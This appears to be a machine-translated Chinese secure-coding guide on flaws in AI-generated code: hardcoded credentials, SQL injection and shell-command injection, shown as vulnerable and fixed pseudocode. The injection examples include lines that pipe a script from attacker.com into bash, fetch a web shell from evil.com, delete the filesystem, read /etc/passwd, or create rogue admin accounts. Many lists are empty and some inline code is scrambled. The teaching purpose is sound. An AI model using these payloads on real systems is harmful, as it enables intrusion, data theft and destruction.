本文深入分析了人工智能生成代码中最常见且最关键的7种安全漏洞。每种漏洞模式都得到了全面的阐述,包括:
这7种模式是根据以下因素,使用加权优先级评分系统(参见[[Ranking-Matrix]])筛选出来的:
| 因素 | 重量 | 描述 |
|---|---|---|
| 频率 | 2倍 | 人工智能产生这种漏洞的频率有多高 |
| 严重程度 | 2倍 | 如果被利用(远程代码执行、数据泄露等),会造成哪些影响? |
| 可检测性 | 1倍 | 代码审查中很容易忽略这一点 |
这些选定的模式可以解释人工智能生成代码中绝大多数的安全事件。研究表明:
本文档中的所有代码示例均为伪代码,旨在说明不同语言的安全模式。实现时:
示例使用通用语法,可映射到 Python、JavaScript、Java、Go 和其他语言中的常见模式。
致开发者:
致安全工程师:
针对人工智能/法学硕士背景:
本文档深入剖析了最关键的安全反模式。每个章节都包含多个示例、极端情况和详细解释。所有代码均为伪代码——请使用目标语言中的安全模式进行实现。请特别注意“常见错误”和“极端情况”小节。这些模式是导致人工智能生成代码中大多数安全漏洞的根源。
生成代码时,您必须:
本文档将详细介绍以下几种模式:
| 秩 | 图案 | 优先评分 | 主要风险 |
|---|---|---|---|
| 1 | 硬编码密钥和凭证管理 | 23 | 立即发生凭证盗窃和利用 |
| 2 | SQL注入和命令注入 | 22/21 | 完全数据库访问权限,任意代码执行 |
| 3 | 跨站脚本攻击(XSS) | 23 | 会话劫持、账户接管 |
| 4 | 身份验证和会话安全 | 22 | 完全绕过身份验证 |
| 5 | 加密故障 | 18-20 | 数据解密,凭证泄露 |
| 6 | 输入验证和数据清理 | 21 | 根本原因导致所有注入攻击 |
| 7 | 依赖风险(非法占屋) | 24 | 供应链遭到破坏,恶意软件执行 |
优先级评分计算方法如下:(Frequency x 2) + (Severity x 2) + Detectability
文档版本:1.0.0最后更新:2026年1月18日基于以下研究:GitHub 安全公告、USENIX 研究、Veracode 报告、CWE Top 25 (2025)、OWASP 指南
CWE 参考: CWE-798(使用硬编码凭据)、CWE-259(使用硬编码密码)、CWE-321(使用硬编码加密密钥)
优先级评分: 23(频率:9,严重性:8,可检测性:6)
硬编码的秘密信息是人工智能生成代码中最普遍、最危险的漏洞之一。问题的根源在于训练数据本身:
为什么人工智能模型会生成硬编码的秘密信息:
训练数据包含示例:教程、文档、Stack Overflow 回答,甚至一些 GitHub 代码库都包含占位符凭据、API 密钥和连接字符串。AI 模型会将这些模式学习为“正常”代码。
训练数据中的复制粘贴文化:开发者在网上分享代码片段时,为了保证完整性,通常会包含凭据。人工智能会学习到,“完整”的代码应该包含带有嵌入式密码的连接字符串。
文档示例与生产代码混淆:训练数据未能清晰区分文档示例(可能展示错误API_KEY = "your-api-key-here")和生产模式。模型将两者都视为有效方法。
上下文窗口限制: AI 在生成代码时无法查看您的.env文件或密钥管理器配置。它生成的是“可运行”的独立代码——这通常意味着代码中包含硬编码的值。
乐于助人偏差:人工智能模型倾向于提供完整、可运行的代码。当用户请求“连接到我的数据库”时,模型会生成完整的连接字符串,而不是需要配置的部分模板。
影响统计数据:
// VULNERABLE: API key hardcoded directly in source
class PaymentService:
API_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"
API_SECRET = "whsec_5f8d7e3a2b1c4f9e8a7d6c5b4e3f2a1d"
function processPayment(amount, currency, cardToken):
headers = {
"Authorization": "Bearer " + this.API_KEY,
"Content-Type": "application/json"
}
payload = {
"amount": amount,
"currency": currency,
"source": cardToken,
"api_key": this.API_KEY // Also exposed in request body
}
return httpPost("https://api.payment.com/charges", payload, headers)
为什么这样做很危险:
sk_live_)表示真实凭据whsec_)允许攻击者伪造 Webhook 事件// VULNERABLE: Full connection string with credentials
DATABASE_URL = "postgresql://admin:SuperSecret123!@prod-db.company.com:5432/production"
// Alternative bad patterns:
DB_CONFIG = {
"host": "10.0.1.50",
"port": 5432,
"database": "customers",
"user": "app_service",
"password": "Tr0ub4dor&3" // Password in config object
}
// Connection string builder - still vulnerable
function getConnection():
return createConnection(
host = "database.internal",
user = "root",
password = "admin123", // Hardcoded in function
database = "app_data"
)
为什么这样做很危险:
// VULNERABLE: JWT secret as a constant
JWT_CONFIG = {
"secret": "my-super-secret-jwt-key-that-should-never-be-shared",
"algorithm": "HS256",
"expiresIn": "24h"
}
function generateToken(userId, role):
payload = {
"sub": userId,
"role": role,
"iat": currentTimestamp()
}
return jwt.sign(payload, JWT_CONFIG.secret, JWT_CONFIG.algorithm)
function verifyToken(token):
return jwt.verify(token, JWT_CONFIG.secret) // Same hardcoded secret
为什么这样做很危险:
// VULNERABLE: OAuth credentials in client-side code
const OAUTH_CONFIG = {
clientId: "1234567890-abcdef.apps.googleusercontent.com",
clientSecret: "GOCSPX-1234567890AbCdEf", // NEVER in frontend!
redirectUri: "https://myapp.com/callback",
scopes: ["email", "profile", "calendar.readonly"]
}
function initiateOAuthFlow():
// Client secret visible in browser dev tools
authUrl = buildUrl("https://accounts.google.com/o/oauth2/auth", {
"client_id": OAUTH_CONFIG.clientId,
"client_secret": OAUTH_CONFIG.clientSecret, // Exposed!
"redirect_uri": OAUTH_CONFIG.redirectUri,
"scope": OAUTH_CONFIG.scopes.join(" "),
"response_type": "code"
})
redirect(authUrl)
为什么这样做很危险:
// VULNERABLE: Private key as a string constant
RSA_PRIVATE_KEY = """
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA2Z3qX2BTLS4e0rVV5BQKTI8qME4MgJFCMU6L6eRoLJGjvJHB
bRp3aNvFUMbJ0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
-----END RSA PRIVATE KEY-----
"""
function signDocument(document):
signature = crypto.sign(document, RSA_PRIVATE_KEY, "SHA256")
return signature
function decryptMessage(encryptedData):
return crypto.decrypt(encryptedData, RSA_PRIVATE_KEY)
为什么这样做很危险:
// SECURE: Load credentials from environment
class PaymentService:
function __init__():
this.apiKey = getEnvironmentVariable("PAYMENT_API_KEY")
this.apiSecret = getEnvironmentVariable("PAYMENT_API_SECRET")
// Fail fast if credentials missing
if this.apiKey is null or this.apiSecret is null:
throw ConfigurationError("Payment credentials not configured")
function processPayment(amount, currency, cardToken):
headers = {
"Authorization": "Bearer " + this.apiKey,
"Content-Type": "application/json"
}
payload = {
"amount": amount,
"currency": currency,
"source": cardToken
// No API key in payload
}
return httpPost("https://api.payment.com/charges", payload, headers)
// Usage in application startup
// Environment variables set externally (shell, container, deployment)
// $ export PAYMENT_API_KEY="sk_live_..."
// $ export PAYMENT_API_SECRET="whsec_..."
为什么说它是安全的:
// SECURE: Retrieve secrets from dedicated secrets manager
class SecretManager:
function __init__(vaultUrl, roleId, secretId):
// Even vault credentials can come from environment
this.vaultUrl = vaultUrl or getEnvironmentVariable("VAULT_URL")
this.roleId = roleId or getEnvironmentVariable("VAULT_ROLE_ID")
this.secretId = secretId or getEnvironmentVariable("VAULT_SECRET_ID")
this.token = null
this.tokenExpiry = null
function authenticate():
response = httpPost(this.vaultUrl + "/v1/auth/approle/login", {
"role_id": this.roleId,
"secret_id": this.secretId
})
this.token = response.auth.client_token
this.tokenExpiry = currentTime() + response.auth.lease_duration
function getSecret(path):
if this.token is null or currentTime() > this.tokenExpiry:
this.authenticate()
response = httpGet(
this.vaultUrl + "/v1/secret/data/" + path,
headers = {"X-Vault-Token": this.token}
)
return response.data.data
// Usage
secretManager = new SecretManager()
dbPassword = secretManager.getSecret("database/production").password
apiKey = secretManager.getSecret("payment/stripe").api_key
为什么说它是安全的:
// SECURE: Dependency injection of configuration
interface IConfig:
function getDatabaseUrl(): string
function getApiKey(): string
function getJwtSecret(): string
class EnvironmentConfig implements IConfig:
function getDatabaseUrl():
return getEnvironmentVariable("DATABASE_URL")
function getApiKey():
return getEnvironmentVariable("API_KEY")
function getJwtSecret():
return getEnvironmentVariable("JWT_SECRET")
class VaultConfig implements IConfig:
secretManager: SecretManager
function getDatabaseUrl():
return this.secretManager.getSecret("db/url").value
function getApiKey():
return this.secretManager.getSecret("api/key").value
function getJwtSecret():
return this.secretManager.getSecret("jwt/secret").value
// Application uses interface - doesn't know where secrets come from
class Application:
config: IConfig
function __init__(config: IConfig):
this.config = config
function connectDatabase():
return createConnection(this.config.getDatabaseUrl())
// Bootstrap based on environment
if getEnvironmentVariable("USE_VAULT") == "true":
config = new VaultConfig(new SecretManager())
else:
config = new EnvironmentConfig()
app = new Application(config)
为什么说它是安全的:
// SECURE: Platform-specific secure credential storage
// For server applications - use instance metadata
class CloudCredentialProvider:
function getDatabaseCredentials():
// AWS: Use IAM database authentication
token = awsRdsGenerateAuthToken(
hostname = getEnvironmentVariable("DB_HOST"),
port = 5432,
username = getEnvironmentVariable("DB_USER")
// No password - uses IAM role attached to instance
)
return {"username": getEnvironmentVariable("DB_USER"), "token": token}
function getApiCredentials():
// Retrieve from AWS Secrets Manager
response = awsSecretsManager.getSecretValue(
SecretId = getEnvironmentVariable("API_SECRET_ARN")
)
return parseJson(response.SecretString)
// For CLI/desktop applications - use OS keychain
class DesktopCredentialProvider:
function storeCredential(service, account, credential):
// Uses OS keychain (Keychain on macOS, Credential Manager on Windows)
keychain.setPassword(service, account, credential)
function getCredential(service, account):
return keychain.getPassword(service, account)
// Usage
cloudProvider = new CloudCredentialProvider()
dbCreds = cloudProvider.getDatabaseCredentials()
connection = createConnection(
host = getEnvironmentVariable("DB_HOST"),
user = dbCreds.username,
authToken = dbCreds.token, // Short-lived token, not password
sslMode = "verify-full"
)
为什么说它是安全的:
// DANGEROUS: Test credentials that can slip into production
// In test file - seems safe
TEST_API_KEY = "sk_test_4242424242424242"
TEST_DB_PASSWORD = "testpassword123"
// But then someone copies test code to production helper:
function quickTest():
// "Temporary" - but stays forever
client = createClient(apiKey = "sk_test_4242424242424242")
return client.ping()
// Or conditionals that fail:
function getApiKey():
if isProduction():
return getEnvironmentVariable("API_KEY")
else:
return "sk_test_4242424242424242" // What if isProduction() has a bug?
// SECURE ALTERNATIVE: Use environment variables even for tests
function getApiKey():
key = getEnvironmentVariable("API_KEY")
if key is null:
throw ConfigurationError("API_KEY environment variable required")
return key
检测:在代码库中搜索_test_,,,,,。_dev_test123password123exampleplaceholder
// DANGEROUS: Secrets in CI/CD configuration files
// .github/workflows/deploy.yml (WRONG)
env:
AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
// docker-compose.yml committed to repo (WRONG)
services:
db:
environment:
POSTGRES_PASSWORD: mysecretpassword
// SECURE: Use CI/CD platform's secrets management
// .github/workflows/deploy.yml (CORRECT)
env:
AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
// docker-compose.yml (CORRECT)
services:
db:
environment:
POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} // From environment
检测:审核 CI/CD 配置文件、Docker Compose 文件、Kubernetes 清单,检查是否存在硬编码凭据。
// DANGEROUS: Secrets in Dockerfile or image layers
// Dockerfile (WRONG - secrets baked into image)
FROM node:18
ENV API_KEY=sk_live_xxxxxxxxxxxxx
RUN echo "password123" > /app/.pgpass
COPY config-with-secrets.json /app/config.json
// Even if you delete later, it's in a layer:
RUN rm /app/.pgpass // Still recoverable from image layers!
// SECURE: Use build secrets or runtime injection
// Dockerfile (CORRECT)
FROM node:18
# No secrets in build context
// docker-compose.yml with runtime secrets
services:
app:
environment:
API_KEY: ${API_KEY} // From host environment
secrets:
- db_password
secrets:
db_password:
external: true // From Docker Swarm secrets or similar
// Or use Docker BuildKit secrets for build-time needs
# syntax=docker/dockerfile:1.2
FROM node:18
RUN --mount=type=secret,id=npm_token \
NPM_TOKEN=$(cat /run/secrets/npm_token) npm install
检测:用于docker history --no-trunc <image>检查各层是否存在秘密信息。
// DANGEROUS: Secrets leaked through logging
function connectToDatabase(config):
logger.info("Connecting with config: " + toJson(config))
// Logs: {"host": "db.com", "user": "admin", "password": "secret123"}
function makeApiRequest(url, headers, body):
logger.debug("Request: " + url + " Headers: " + toJson(headers))
// Logs: Authorization: Bearer sk_live_xxxxx
function handleError(error):
logger.error("Error: " + error.message + " Stack: " + error.stack)
// Stack trace might contain secrets from variables
// SECURE: Sanitize before logging
function sanitizeForLogging(obj):
sensitiveKeys = ["password", "secret", "key", "token", "auth", "credential"]
result = deepCopy(obj)
for key in result.keys():
if any(sensitive in key.lower() for sensitive in sensitiveKeys):
result[key] = "[REDACTED]"
return result
function connectToDatabase(config):
logger.info("Connecting with config: " + toJson(sanitizeForLogging(config)))
// Logs: {"host": "db.com", "user": "admin", "password": "[REDACTED]"}
// Or use structured logging with secret types
class Secret:
value: string
function toString(): return "[SECRET]"
function toJson(): return "[SECRET]"
function getValue(): return this.value // Only accessible explicitly
检测:搜索日志中是否存在类似password=“, token=, key=, bearer tokens, connection strings”的模式。
// project/.env (NEVER COMMIT THIS)
DATABASE_URL=postgresql://user:password@localhost/db
API_KEY=sk_live_xxxxxxxxxx
JWT_SECRET=my-secret-key
// .gitignore (MUST INCLUDE)
.env
.env.local
.env.*.local
*.pem
*.key
credentials.json
secrets.yaml
// CORRECT: Commit a template instead
// project/.env.example (SAFE TO COMMIT)
DATABASE_URL=postgresql://user:password@localhost/db
API_KEY=your_api_key_here
JWT_SECRET=generate_a_secure_random_string
// Add pre-commit hook to prevent accidental commits
// .git/hooks/pre-commit
#!/bin/bash
if git diff --cached --name-only | grep -E '\.env$|credentials|secrets'; then
echo "ERROR: Attempting to commit potential secrets file"
exit 1
fi
检测方法:检查 Git 历史记录:git log --all --full-history -- "*.env" "*credentials*" "*secrets*"
// DANGEROUS: Secrets exposed in error handling
function connectToPaymentApi():
try:
apiKey = getApiKey()
response = httpPost(
"https://api.payment.com/connect",
headers = {"Authorization": "Bearer " + apiKey}
)
catch error:
// Exposes API key in error log and potentially to users
throw new Error("Failed to connect with key: " + apiKey + ". Error: " + error)
// SECURE: Never include secrets in error messages
function connectToPaymentApi():
try:
apiKey = getApiKey()
response = httpPost(
"https://api.payment.com/connect",
headers = {"Authorization": "Bearer " + apiKey}
)
catch error:
// Log correlation ID, not secrets
correlationId = generateUUID()
logger.error("Payment API connection failed", {
"correlationId": correlationId,
"errorCode": error.code,
"endpoint": "api.payment.com"
// No API key!
})
throw new Error("Payment service unavailable. Reference: " + correlationId)
// DANGEROUS: Secrets in URL query parameters
function makeAuthenticatedRequest(endpoint, apiKey):
// API keys in URLs are logged everywhere:
// - Browser history
// - Server access logs
// - Proxy logs
// - Referrer headers
url = "https://api.service.com" + endpoint + "?api_key=" + apiKey
return httpGet(url)
// Even worse with multiple secrets:
url = "https://api.com/data?key=" + apiKey + "&secret=" + secretKey
// SECURE: Use headers for authentication
function makeAuthenticatedRequest(endpoint, apiKey):
return httpGet(
"https://api.service.com" + endpoint,
headers = {
"Authorization": "Bearer " + apiKey,
// Or API-specific header
"X-API-Key": apiKey
}
)
检测:搜索包含逗号?api_key=、?token=逗号?secret=、逗号的 URL。?password=
// High-confidence patterns to search for:
// 1. Direct assignment to suspicious variable names
regex: /(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']/i
// 2. Common API key formats
regex: /(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)/
// 3. Private key markers
regex: /-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/
// 4. Connection strings with passwords
regex: /(mysql|postgresql|mongodb|redis):\/\/[^:]+:[^@]+@/
// 5. Base64 encoded secrets (often JWT secrets)
regex: /["'][A-Za-z0-9+\/=]{40,}["']/
| 查看 | 需要注意什么 |
|---|---|
| 常量 | 身份验证/配置代码中的任何字符串常量 |
| 配置对象 | 包含非占位符值的凭证字段 |
| 连接码 | 数据库连接,带有内联凭据的 API 客户端 |
| 测试文件 | 测试凭证可能是真实的,或者将来会变成真实的 |
| CI/CD | 流水线配置、Docker 文件、部署脚本 |
| 评论 | “待办事项:移至环境”注释,其中包含实际密钥。 |
.gitignore包括所有秘密文件模式(.env,,*.pem等等)CWE 参考: CWE-89(SQL 注入)、CWE-77(命令注入)、CWE-78(操作系统命令注入)
优先级评分: 22/21(SQL:频率 10,严重性 10,可检测性 4;命令:频率 8,严重性 10,可检测性 6)
SQL注入和命令注入是最古老的漏洞类型之一,但它们仍然以惊人的速度困扰着人工智能生成的代码。尽管几十年来人们一直在进行安全编码教育,并建立了完善的缓解措施,但人工智能模型仍然会持续生成存在漏洞的代码。
为什么人工智能模型会产生注入漏洞:
训练数据污染:研究表明,在 GitHub 代码库的 AI 训练数据中,字符串拼接查询出现了“数千次”。这种易受攻击的模式在统计上比历史代码库中的安全模式更为常见。
简单性偏好:字符串拼接在语法上比参数化查询更简单。人工智能模型旨在生成“可运行的代码”,而拼接方法需要的词法单元和概念更少。
缺乏对抗感知能力:人工智能模型本身并不具备识别用户输入恶意行为的能力。当被要求“按ID查询用户”时,模型关注的是功能需求,而非安全隐患。
教程代码普遍存在:许多教程和文档示例为了简洁起见,展示了存在安全漏洞的代码模式。人工智能会学习到这种f"SELECT * FROM users WHERE id = {id}"模式是有效的。
上下文限制:人工智能无法了解您的完整应用程序架构、威胁模型或数据流。它不知道哪些输入来自不可信来源。
影响统计数据:
// VULNERABLE: Direct string concatenation
function getUserById(userId):
query = "SELECT * FROM users WHERE id = " + userId
return database.execute(query)
// Even worse with f-string/template literal
function getUserByEmail(email):
query = f"SELECT * FROM users WHERE email = '{email}'"
return database.execute(query)
// Attack: email = "' OR '1'='1' --"
// Result: SELECT * FROM users WHERE email = '' OR '1'='1' --'
// Returns ALL users in the database
为什么这样做很危险:
' OR '1'='1模式绕过身份验证--,,#)/**/可以截断查询的剩余部分// VULNERABLE: User-controlled table name
function getDataFromTable(tableName, id):
query = f"SELECT * FROM {tableName} WHERE id = {id}"
return database.execute(query)
// Attack: tableName = "users; DROP TABLE users; --"
// Result: SELECT * FROM users; DROP TABLE users; -- WHERE id = 1
// VULNERABLE: User-controlled column names
function sortUsers(sortColumn, sortOrder):
query = f"SELECT * FROM users ORDER BY {sortColumn} {sortOrder}"
return database.execute(query)
// Attack: sortColumn = "(SELECT password FROM users WHERE is_admin=1)"
// Result: Data exfiltration through error messages or timing
为什么这样做很危险:
// VULNERABLE: ORDER BY with user input
function getProductList(category, sortBy):
query = f"SELECT * FROM products WHERE category = ? ORDER BY {sortBy}"
return database.execute(query, [category])
// Attack: sortBy = "price, (CASE WHEN (SELECT password FROM users LIMIT 1)
// LIKE 'a%' THEN price ELSE name END)"
// Result: Boolean-based blind SQL injection
// Attack: sortBy = "IF(1=1, price, name)"
// Result: Confirms SQL injection is possible
为什么这样做很危险:
// VULNERABLE: Unescaped LIKE pattern
function searchProducts(searchTerm):
query = f"SELECT * FROM products WHERE name LIKE '%{searchTerm}%'"
return database.execute(query)
// Attack: searchTerm = "%' UNION SELECT username, password, null FROM users --"
// Result: UNION-based data extraction
// Even "safer" version has issues:
function searchProductsSafe(searchTerm):
query = "SELECT * FROM products WHERE name LIKE ?"
return database.execute(query, [f"%{searchTerm}%"])
// Attack: searchTerm = "%" (matches everything - DoS through performance)
// Attack: searchTerm = "_" repeated (wildcard matching - info disclosure)
为什么这样做很危险:
%_在参数化查询中有效,但在 LIKE 查询中危险。// VULNERABLE: Query that allows stacking
function updateUserEmail(userId, newEmail):
query = f"UPDATE users SET email = '{newEmail}' WHERE id = {userId}"
database.execute(query, multiStatement = true)
// Attack: newEmail = "x'; INSERT INTO users (email, role) VALUES ('attacker@evil.com', 'admin'); --"
// Result: Creates new admin account
// Attack: newEmail = "x'; UPDATE users SET password = 'hacked' WHERE role = 'admin'; --"
// Result: Mass password reset for all admins
为什么这样做很危险:
// VULNERABLE: Direct command construction
function pingHost(hostname):
command = "ping -c 4 " + hostname
return shell.execute(command)
// Attack: hostname = "127.0.0.1; cat /etc/passwd"
// Result: ping -c 4 127.0.0.1; cat /etc/passwd
// Executes both commands
// VULNERABLE: Using shell=True with format strings
function checkDiskUsage(directory):
command = f"du -sh {directory}"
return subprocess.run(command, shell=True)
// Attack: directory = "/tmp; rm -rf /"
// Result: Destructive command execution
为什么这样做很危险:
;,,,,反引号|)支持命令链式&调用$()// VULNERABLE: File path from user input
function convertImage(inputFile, outputFile):
command = f"convert {inputFile} -resize 800x600 {outputFile}"
return shell.execute(command)
// Attack: inputFile = "image.jpg; curl attacker.com/shell.sh | bash"
// Result: Downloads and executes malware
// Attack: inputFile = "$(cat /etc/passwd > /tmp/out.txt)image.jpg"
// Result: File exfiltration via command substitution
// VULNERABLE: Filename in archiving
function createBackup(filename):
command = f"tar -czf backup.tar.gz {filename}"
return shell.execute(command)
// Attack: filename = "--checkpoint=1 --checkpoint-action=exec=sh\ shell.sh"
// Result: tar option injection (GTFOBins-style attack)
为什么这样做很危险:
$(...)反引号用于执行子命令// VULNERABLE: Arguments from user input
function fetchUrl(url):
command = f"curl {url}"
return shell.execute(command)
// Attack: url = "-o /var/www/html/shell.php http://evil.com/shell.php"
// Result: Writes file to webserver (web shell)
// Attack: url = "--config /etc/passwd"
// Result: Error message reveals file contents
// VULNERABLE: Git commands with user input
function cloneRepository(repoUrl):
command = f"git clone {repoUrl}"
return shell.execute(command)
// Attack: repoUrl = "--upload-pack='touch /tmp/pwned' git://evil.com/repo"
// Result: Arbitrary command execution via git options
为什么这样做很危险:
--并非总能阻止注射(取决于具体程序)// VULNERABLE: User-controlled environment variable
function runWithCustomPath(command, customPath):
environment = {"PATH": customPath}
return subprocess.run(command, env=environment, shell=True)
// Attack: customPath = "/tmp/evil:$PATH"
// If /tmp/evil contains malicious 'ls' binary, it executes instead
// VULNERABLE: Library path manipulation
function loadPlugin(pluginPath):
environment = {"LD_PRELOAD": pluginPath}
return subprocess.run("target-app", env=environment)
// Attack: pluginPath = "/tmp/evil.so"
// Result: Malicious shared library loaded, code execution
为什么这样做很危险:
// SECURE: Parameterized query - positional parameters
function getUserById(userId):
query = "SELECT * FROM users WHERE id = ?"
return database.execute(query, [userId])
// SECURE: Named parameters
function getUserByEmailAndStatus(email, status):
query = "SELECT * FROM users WHERE email = :email AND status = :status"
return database.execute(query, {email: email, status: status})
// SECURE: Multiple value insertion
function createUser(name, email, role):
query = "INSERT INTO users (name, email, role) VALUES (?, ?, ?)"
return database.execute(query, [name, email, role])
// SECURE: IN clause with dynamic count
function getUsersByIds(userIds):
placeholders = ", ".join(["?" for _ in userIds])
query = f"SELECT * FROM users WHERE id IN ({placeholders})"
return database.execute(query, userIds)
// SECURE: Transaction with multiple parameterized queries
function transferFunds(fromId, toId, amount):
database.beginTransaction()
try:
database.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", [amount, fromId])
database.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", [amount, toId])
database.commit()
catch error:
database.rollback()
throw error
为什么说它是安全的:
// SECURE: ORM with typed queries
function getUserById(userId):
return User.findOne({where: {id: userId}})
// SECURE: ORM with relationships
function getUserWithOrders(userId):
return User.findOne({
where: {id: userId},
include: [{model: Order, as: 'orders'}]
})
// SECURE: ORM query builder
function searchProducts(filters):
query = Product.query()
if filters.category:
query = query.where('category', '=', filters.category)
if filters.minPrice:
query = query.where('price', '>=', filters.minPrice)
if filters.maxPrice:
query = query.where('price', '<=', filters.maxPrice)
return query.get()
// WARNING: ORM raw query - still needs parameterization!
function customQuery(userId):
// STILL VULNERABLE if using string interpolation:
// return database.raw(f"SELECT * FROM users WHERE id = {userId}")
// SECURE: Use ORM's parameterization
return database.raw("SELECT * FROM users WHERE id = ?", [userId])
为什么说它是安全的:
// SECURE: Allowlist for table names
ALLOWED_TABLES = {"users", "products", "orders", "categories"}
function getDataFromTable(tableName, id):
if tableName not in ALLOWED_TABLES:
throw ValidationError("Invalid table name")
// Safe because tableName is from allowlist, not user input
query = f"SELECT * FROM {tableName} WHERE id = ?"
return database.execute(query, [id])
// SECURE: Allowlist for sort columns
SORT_COLUMNS = {
"name": "name",
"price": "price",
"date": "created_at",
"popularity": "view_count"
}
function getProducts(sortBy, sortOrder):
column = SORT_COLUMNS.get(sortBy, "name") // Default to 'name'
direction = "DESC" if sortOrder == "desc" else "ASC"
query = f"SELECT * FROM products ORDER BY {column} {direction}"
return database.execute(query)
// SECURE: Quoted identifiers as additional defense
function getDataDynamic(tableName, columnName, value):
if tableName not in ALLOWED_TABLES:
throw ValidationError("Invalid table")
if columnName not in ALLOWED_COLUMNS[tableName]:
throw ValidationError("Invalid column")
// Use database quoting function for identifiers
quotedTable = database.quoteIdentifier(tableName)
quotedColumn = database.quoteIdentifier(columnName)
query = f"SELECT * FROM {quotedTable} WHERE {quotedColumn} = ?"
return database.execute(query, [value])
为什么说它是安全的:
// SECURE: Argument array (no shell interpretation)
function pingHost(hostname):
// Validate hostname format first
if not isValidHostname(hostname):
throw ValidationError("Invalid hostname format")
// Use argument array - shell metacharacters are literal
result = subprocess.run(
["ping", "-c", "4", hostname],
shell = false, // CRITICAL: no shell interpretation
capture_output = true,
timeout = 30
)
return result.stdout
// SECURE: Allowlist for command arguments
ALLOWED_FORMATS = {"png", "jpg", "gif", "webp"}
function convertImage(inputPath, outputPath, format):
// Validate format from allowlist
if format not in ALLOWED_FORMATS:
throw ValidationError("Invalid format")
// Validate paths are within allowed directory
if not isPathWithinDirectory(inputPath, UPLOAD_DIR):
throw ValidationError("Invalid input path")
if not isPathWithinDirectory(outputPath, OUTPUT_DIR):
throw ValidationError("Invalid output path")
// Safe argument array
result = subprocess.run(
["convert", inputPath, "-resize", "800x600", f"{outputPath}.{format}"],
shell = false
)
return result
// SECURE: Using libraries instead of shell commands
function checkDiskUsage(directory):
// Use language-native library instead of shell
return filesystem.getDirectorySize(directory)
function readJsonFile(filepath):
// Don't use: shell.execute(f"cat {filepath} | jq .")
// Use language JSON library
return json.parse(filesystem.readFile(filepath))
为什么说它是安全的:
// DANGEROUS: Data stored safely but used unsafely later
// Step 1: User creates profile (looks safe)
function createProfile(userId, displayName):
// Parameterized - SAFE for initial storage
query = "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)"
database.execute(query, [userId, displayName])
// Attacker sets displayName = "admin'--"
// Step 2: Background job uses stored data UNSAFELY
function generateReportForUser(userId):
// Get the stored display name
profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId])
displayName = profile.display_name
// "admin'--" retrieved from database
// VULNERABLE: Trusting data from database
reportQuery = f"INSERT INTO reports (title) VALUES ('Report for {displayName}')"
database.execute(reportQuery)
// Result: INSERT INTO reports (title) VALUES ('Report for admin'--')
// SECURE: Parameterize ALL queries, even with "internal" data
function generateReportForUserSafe(userId):
profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId])
// Still parameterize even though data is from database
reportQuery = "INSERT INTO reports (title) VALUES (?)"
database.execute(reportQuery, [f"Report for {profile.display_name}"])
检测:审核所有在后续查询中使用数据库数据的代码路径。
// DANGEROUS: Dynamic SQL inside stored procedure
// Stored Procedure Definition (in database)
CREATE PROCEDURE searchUsers(searchTerm VARCHAR(100))
BEGIN
// VULNERABLE: Dynamic SQL construction
SET @query = CONCAT('SELECT * FROM users WHERE name LIKE ''%', searchTerm, '%''');
PREPARE stmt FROM @query;
EXECUTE stmt;
END
// Application code looks safe...
function searchUsers(term):
return database.callProcedure("searchUsers", [term])
// But injection still occurs inside the procedure!
// SECURE: Parameterized even in stored procedures
CREATE PROCEDURE searchUsersSafe(searchTerm VARCHAR(100))
BEGIN
// Use parameterization within procedure
SELECT * FROM users WHERE name LIKE CONCAT('%', searchTerm, '%');
// Or use prepared statement properly
SET @query = 'SELECT * FROM users WHERE name LIKE ?';
SET @search = CONCAT('%', searchTerm, '%');
PREPARE stmt FROM @query;
EXECUTE stmt USING @search;
END
检测:检查所有存储过程是否存在动态 SQL 构造。
// DANGEROUS: Encoding-based bypass attempts
// Scenario 1: Double-encoding bypass
function searchWithFilter(term):
// Application URL-decodes once
decoded = urlDecode(term) // %2527 -> %27
// WAF sees %27, not single quote
// Second decode happens: %27 -> '
query = f"SELECT * FROM items WHERE name = '{decoded}'"
// Injection succeeds
// Scenario 2: Unicode normalization bypass
function filterUsername(username):
// Check for dangerous characters
if "'" in username or "\"" in username:
throw ValidationError("Invalid characters")
// VULNERABLE: Unicode normalization happens AFTER validation
normalized = unicodeNormalize(username)
// 'ʼ' (U+02BC) might normalize to "'" (U+0027) in some systems
query = f"SELECT * FROM users WHERE username = '{normalized}'"
// SECURE: Parameterization makes encoding irrelevant
function searchSafe(term):
// Encoding doesn't matter - it's just data
query = "SELECT * FROM items WHERE name = ?"
return database.execute(query, [term])
// SECURE: Validate AFTER all normalization
function filterUsernameSafe(username):
// Normalize first
normalized = unicodeNormalize(username)
// Then validate
if not isValidUsernameChars(normalized):
throw ValidationError("Invalid characters")
// Then use (still with parameterization)
query = "SELECT * FROM users WHERE username = ?"
return database.execute(query, [normalized])
检测:使用各种编码有效载荷(%27,,%2527Unicode 变体)进行测试。
// DANGEROUS: Manual escaping is error-prone
function getUserByNameEscaped(name):
// "Escaping" by replacing quotes
escapedName = name.replace("'", "''")
query = f"SELECT * FROM users WHERE name = '{escapedName}'"
return database.execute(query)
// Problems with this approach:
// 1. Different databases have different escape rules
// 2. Multibyte character encoding bypasses (GBK, etc.)
// 3. Doesn't handle all injection vectors
// 4. Easy to forget in one place
// 5. Backslash escaping varies by database
// Attack (MySQL with NO_BACKSLASH_ESCAPES off):
// name = "\' OR 1=1 --"
// Result: \'' OR 1=1 -- (backslash escapes first quote)
// Attack (multibyte): name = 0xbf27
